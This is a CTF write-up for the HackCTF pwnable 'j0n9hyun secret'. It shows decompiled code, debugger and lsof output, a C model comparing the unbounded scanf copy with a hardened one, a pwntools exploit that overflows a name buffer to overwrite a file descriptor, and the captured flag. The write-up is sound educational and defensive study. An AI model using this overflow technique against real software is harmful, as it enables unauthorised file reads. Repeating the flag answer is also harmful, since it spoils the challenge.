[HackCTF / pwnable] j0n9hyun secret

2020. 6. 10. 17:16Wargame & CTF/HackCTF


HackCTF - j0n9hyun secret

Summary

  • buffer overflow

Analysis

int __cdecl main(int argc, const char **argv, const char **envp)
{
 __int64 v3; // r8
 __int64 v4; // r8
 __int64 v5; // r8
 int v6; // ST0C_4

 sub_40FDD0((unsigned int *)off_6CA748, 0LL, 2LL, 0LL, v3);
 sub_40FDD0((unsigned int *)off_6CA740, 0LL, 2LL, 0LL, v4);
 sub_40FDD0((unsigned int *)off_6CA738, 0LL, 2LL, 0LL, v5);
 f = fopen("top_secret", (char *)'r');
 printf("input name: ", 'r');
 scanf("%s", &name);
 v6 = read(f, &buffer, 0x12CuLL);
 write(1, &buffer, v6);
 return 0;
}
__int32 fopen_flag()
{
 return fopen("flag", (char *)0x72);
}
gdb-peda$ info proc
process 2499
cmdline = '/home/cg10036/CTF/hackCTF/j0n9hyun_secret/j0n9hyun_secret'
cwd = '/home/cg10036/CTF/hackCTF/j0n9hyun_secret'
exe = '/home/cg10036/CTF/hackCTF/j0n9hyun_secret/j0n9hyun_secret'
gdb-peda$ shell lsof -p 2499
lsof: WARNING: can't stat() fuse.gvfsd-fuse file system /run/user/108/gvfs
    Output information may be incomplete.
COMMAND   PID   USER   FD   TYPE DEVICE SIZE/OFF   NODE NAME
j0n9hyun_ 2499 cg10036 cwd   DIR    8,1     4096 2097160 /home/cg10036/CTF/hackCTF/j0n9hyun_secret
j0n9hyun_ 2499 cg10036 rtd   DIR    8,1     4096       2 /
j0n9hyun_ 2499 cg10036 txt   REG    8,1   840640 2099803 /home/cg10036/CTF/hackCTF/j0n9hyun_secret/j0n9hyun_secret
j0n9hyun_ 2499 cg10036   0u   CHR  136,0     0t0       3 /dev/pts/0
j0n9hyun_ 2499 cg10036   1u   CHR  136,0     0t0       3 /dev/pts/0
j0n9hyun_ 2499 cg10036   2u   CHR  136,0     0t0       3 /dev/pts/0
j0n9hyun_ 2499 cg10036   3u   REG    8,1       15 2100969 /home/cg10036/CTF/hackCTF/j0n9hyun_secret/flag
j0n9hyun_ 2499 cg10036   4u   REG    8,1       23 2100989 /home/cg10036/CTF/hackCTF/j0n9hyun_secret/top_secret

When name is read in, the input overflows into f; overwriting f with 3 makes the program read the flag instead.
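
To show the root cause from the defender's side, here is an added C model (not the challenge binary's source) of the two adjacent globals: a name buffer followed 0x138 bytes later by the descriptor f, with the unbounded copy beside a width-limited one. The struct layout, the initial descriptor 4 and the sample input are constructed from the addresses and lsof output above; a little-endian host is assumed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the globals as the writeup lays them out: `name` at
 * 0x6CCD60 and `f` at 0x6CCE98, so only their 0x138-byte distance matters. */
#define NAME_SIZE (0x6CCE98u - 0x6CCD60u)   /* 0x138 = 312 bytes */
struct bss_layout {
    char name[NAME_SIZE];
    int  f;   /* descriptor for top_secret; fd 4 in the lsof output above */
};

/* Vulnerable: models scanf("%s", &name), an unbounded copy up to the NUL.
 * It writes through a char pointer into the whole struct so that running
 * past `name` into `f` stays well-defined C for this demonstration. */
static int read_name_vulnerable(struct bss_layout *s, const char *input)
{
    char *dst = (char *)s + offsetof(struct bss_layout, name);
    while (*input)
        *dst++ = *input++;
    *dst = '\0';
    return s->f;
}

/* Hardened: the field width (NAME_SIZE - 1 = 311) caps the copy at 311
 * bytes plus the NUL, so `f` is never touched however long the input is. */
static int read_name_hardened(struct bss_layout *s, const char *input)
{
    (void)sscanf(input, "%311s", s->name);
    return s->f;
}

/* Feeds a constructed input shaped like the writeup's payload (NAME_SIZE
 * filler bytes, then 0x03, the flag's descriptor in lsof) to one reader with
 * f = 4 and returns f afterwards; little-endian assumed for the 3 result. */
static int f_after(int (*reader)(struct bss_layout *, const char *))
{
    char input[NAME_SIZE + 2] = {0};
    memset(input, 'A', NAME_SIZE);
    input[NAME_SIZE] = 0x03;
    struct bss_layout s = { {0}, 4 };
    return reader(&s, input);
}

int main(void)
{
    printf("vulnerable: f = %d\n", f_after(read_name_vulnerable));   /* 3 */
    printf("hardened:   f = %d\n", f_after(read_name_hardened));     /* 4 */
    return 0;
}
```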

Exploit

from pwn import *

e = ELF("./j0n9hyun_secret")
#p = process("./j0n9hyun_secret")
p = remote("ctf.j0n9hyun.xyz", 3031)

p.recvuntil(b"input name: ")

# name is at 0x6CCD60 and f at 0x6CCE98, so 0x138 bytes of filler reach f;
# scanf("%s") has no length limit, so the overflow needs nothing else.
payload = b""
payload += b"A" * (0x6CCE98 - 0x6CCD60)
payload += p32(0x3)   # replace top_secret's fd (4) with the flag's fd (3)

p.sendline(payload)
p.interactive()

Flag

cg10036@cg10036-virtual-machine:~/CTF/hackCTF/j0n9hyun_secret$ p ex.py 
[*] '/home/cg10036/CTF/hackCTF/j0n9hyun_secret/j0n9hyun_secret'
  Arch:     amd64-64-little
  RELRO:   Partial RELRO
  Stack:   No canary found
  NX:       NX enabled
  PIE:     No PIE (0x400000)
[+] Opening connection to ctf.j0n9hyun.xyz on port 3031: Done
[*] Switching to interactive mode
HackCTF{ez_fd_0v4rwr1t4}

